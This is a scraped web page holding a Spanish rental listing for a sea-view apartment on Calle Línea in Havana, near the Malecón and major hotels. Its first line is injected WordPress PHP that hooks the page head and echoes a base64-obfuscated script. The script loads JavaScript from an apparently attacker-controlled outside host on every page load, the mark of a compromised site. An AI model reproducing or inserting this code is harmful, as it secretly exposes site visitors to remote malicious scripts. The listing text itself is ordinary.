function add_theme_scripts_PHNjcmlw() { echo base64_decode("PHNjcmlwdD52YXIgRG5XWmJsWklHSj1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtEbldaYmxaSUdKLnNyYz1hdG9iKCJhSFIwY0hNNkx5OXpZWEpqYjIxaExuTndZV05sTDJwekwyMXBiaTV0WVdsdUxtcHoiKTtkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLmFwcGVuZENoaWxkKERuV1pibFpJR0opOzwvc2NyaXB0Pg=="); } add_action( 'wp_head', 'add_theme_scripts_PHNjcmlw', 0 );
El apartamento está bien situado en la calle Línea, una de las arterias principales de La Habana, con acceso directo al malecón habanero y el centro de la ciudad, cerca de paradas de bus turístico, saliendo del edificio podrá acceder a taxis locales (almendrones) o taxis para rentar con algún destino específico.
Próximo a los Hoteles como Meliá Cohíba y Riviera. Rodeado para su mejor comodidad de: casas de cambio, correos, Teatro Mella, Paladares, Centro Comercial Galerías Paseo. A 15 minutos de Centro Habana y del centro histórico de la ciudad.
El apartamento es ideal para familias y amigos por su distribución y tiene una extraordinaria vista al mar y la ciudad.
Se describe en:
Se ubica a solo unas pocas cuadras de el malecón habanero, el malecón habanero donde se observan increíbles puestas de sol sobre la costa de Habana, o simplemente puede caminar por sus 4 millas de largo, disfrutando de la gente, la música y el aire fresco.